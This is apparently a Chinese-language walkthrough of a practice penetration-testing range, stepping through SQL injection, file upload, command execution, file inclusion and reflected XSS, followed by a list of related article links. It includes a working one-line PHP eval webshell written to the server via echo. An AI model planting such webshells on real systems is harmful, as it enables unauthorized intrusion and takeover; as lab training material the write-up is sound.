seafaring靶场渗透测试

1.sql注入漏洞

进来这里有个框

尝试xss没有那咱们就来试试搜索行注入

这里有东西说明闭合成功,接着就order by 有三列

三个地方都有回显

查看数据库

这里查表发现只有两个

先去看看admin先来看看列

然后看用户密码,这里密码直接显示出来了

2.文件上传漏洞

拿去登录看看里边有个上传文件的地方上传一个一句话木马上去

可以上传php

拿它给的地址去访问,成功访问到

拿去蚁剑连接成功

3.命令执行漏洞

下边有个框里边有个ls这里我直接点了个执行

结果就可以看到文件

输入whoami能显示

直接写入一句话木马 echo '<?php phpinfo();@eval($_POST[cmd]);?>' > sxy.php

然后访问

再拿去连接

4.文件包含漏洞

点关于弹出来about.php?file=header.php说明存在文件包含我们上边可以通过写入的phpinfo看到远程文件包含关闭

那只能用本地文件包含了,这里通过读取上边写入的木马文件来访问

这里上边连过了就不连了

5.xss反射型

来到登录页面两个框

先试上边的成功回显弹窗

相关推荐
世界尽头与你2 小时前
【安全扫描器原理】网络扫描算法
网络·安全
AI拉呱_2 小时前
医院行业等保2.0案例
安全·web安全
中云时代-防御可测试-小余4 小时前
高防IP是如何防护DDoS攻击和CC攻击的
运维·服务器·tcp/ip·安全·阿里云·ddos·宽度优先
帅云毅6 小时前
文件上传--解析漏洞和编辑器
笔记·学习·安全·web安全·编辑器·php
樽酒ﻬق6 小时前
深度解析 Kubernetes 配置管理:如何安全使用 ConfigMap 和 Secret
安全·贪心算法·kubernetes
云天徽上7 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
人工智能·安全·web安全·机器学习·信息可视化·数据分析
网络之路Blog7 小时前
【实战中提升自己】内网安全部署之端口隔离与MAC地址认证
安全·macos·网络之路一天·华为华三数通基础·华为华三企业实战架构·华为中小型企业实战·华为华三计算机网络基础
杨凯凡9 小时前
Linux安全防护:全方位服务安全配置指南
linux·运维·服务器·安全
德克西尔DrKsir10 小时前
石油化工行业氢气浓度检测仪的应用与选择
安全
独孤歌10 小时前
告别频繁登录:打造用户无感的 Token 刷新机制
安全·面试